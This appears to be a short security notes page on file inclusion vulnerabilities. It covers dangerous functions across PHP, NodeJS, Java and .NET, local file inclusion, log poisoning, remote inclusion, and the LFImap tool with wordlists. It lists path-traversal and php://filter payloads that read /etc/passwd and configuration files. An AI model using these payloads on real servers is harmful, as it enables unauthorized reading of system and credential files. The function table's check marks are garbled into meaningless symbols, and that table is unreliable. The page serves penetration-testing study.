File Inclusion
Notes about some basic File Insclusion attack
Playground
Dangerous Function
Function
Read Content
Execute
Remote URL
PHP
include()/include_once()
β
β
β
require()/require_once()
β
β
β
file_get_contents()
β
β
β
fopen()/file()
β
β
β
NodeJS
fs.readFile()
β
β
β
fs.sendFile()
β
β
β
res.render()
β
β
β
Java
include
β
β
β
import
β
β
β
.NET
@Html.Partial()
β
β
β
@Html.RemotePartial()
β
β
β
Response.WriteFile()
β
β
β
include
β
β
β
Local File Inclusion (LFI)
Local File Inclusion (LFI) is a type of vulnerability where an attacker can exploit a web application to include files that are already present on the server. By manipulating input parameters, such as URLs or form fields, the attacker can trick the application into loading files from the local file system, potentially accessing sensitive information or executing malicious code.
Basic LFI Payloads
/etc/passwd
Basic LFI
../../../../etc/passwd
LFI with path traversal
/../../../etc/passwd
LFI with name prefix
./languages/../../../../etc/passwd
LFI with approved path
php://filter/read=convert.base64-encode/resource=config
LFI with Base64 Filter
../../../../etc/passwd%00
LFI with Null byte
Log Poisoning to RCE
Access Log Location
Apache:
Nginx:
/var/log/nginx/access.log
LFI to RCE
Remote File Inclusion (RFI)
In most languages, including remote URLs is considered as a dangerous practice as it may allow for such vulnerabilities. This is why remote URL inclusion is usually disabled by default. For example, any remote URL inclusion in PHP would require the allow_url_include setting to be enabled.
Automation
Tools
LFImap
WordLists
https://raw.githubusercontent.com/DragonJAR/Security-Wordlist/main/LFI-WordList-Linux
https://raw.githubusercontent.com/DragonJAR/Security-Wordlist/main/LFI-WordList-Windows
https://github.com/danielmiessler/SecLists/blob/master/Fuzzing/LFI/LFI-Jhaddix.txt
References
Last updated
Was this helpful?